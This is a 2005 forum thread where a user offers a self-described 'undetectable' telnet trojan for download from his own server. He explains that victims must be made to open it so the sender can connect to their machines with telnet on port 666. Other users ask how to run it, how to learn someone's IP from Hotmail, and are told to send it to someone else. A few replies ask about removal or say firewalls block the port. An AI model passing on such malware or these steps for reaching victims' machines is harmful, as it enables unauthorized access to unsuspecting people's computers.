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    carlo Guest

    Telnet trojan

    I Have created a undetectable trojan. If anyone wish's to have it i have put it on my sever so you can download it [URL=http://cookielogger.t*5.com/RemoteTelnetTrojan.zip]click here[/URL] . But this is a telnet trojan which menas once they open it you have to connect to them through telnet on port 666. If you do not have any knoledge on telnet do not ask for this

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    Last edited by carlo; 09-26-2005 at 08:13 AM.

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    carlo Guest

    Just so you know..

    Just so you know not * av or firewall can detect this.

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    telnet

    How do you open ports and IP address's using tellnet?????

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    carlo Guest

    this

    open telnet. type open or o then the persons ip address and then port 666.

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    It says it is unable to conncting using port 666.

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    carlo Guest

    Changed ip

    Unfortunatly this person has changed his ip address mate sorry.

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    Hotmail

    Can you find out some*s ip from talking to them on hotmail if so how?

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    giving me error 424 fix plz

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    how would you go about removing this trojan?

    is it as simple as ending the server.exe process, or does it copy itself onto the disk?

    -thanks

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    Any decent $*00 firewall will be able to detect this. Port 666 is a commonly known virus/trojan port. All it takes is one rule in the firewall configuration to block all traffic to this port. The firewall will record your IP address trying to connect to that machine on port 666 and the network admin will go after you next!
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    Quote Originally Posted by wootn0w
    giving me error 424 fix plz
    lol, YOU aren't supposed to open it, you need to send it to someone and have them open it.

    then try to telnet into IP ADDRESS HERE 666 (like telnet ***.***.***.*** 666)

    doubtful that this will work. most AV scanners thats ive tried it on pick it up.

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    Quote Originally Posted by SyntaX******
    Any decent $*00 firewall will be able to detect this. Port 666 is a commonly known virus/trojan port. All it takes is one rule in the firewall configuration to block all traffic to this port. The firewall will record your IP address trying to connect to that machine on port 666 and the network admin will go after you next!
    by network adminstartor do u mean like the person owning the computer or the isp?
    WAFFLES?!?!? OMFG WHERE?!!?

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    Quote Originally Posted by Alucard
    by network adminstartor do u mean like the person owning the computer or the isp?
    A network admin is a person employed by any large company that sets up, controls and analyses their corporate network. They deal with any problems, security issues etc. the network has, and will try to prevent any hackers from getting in.

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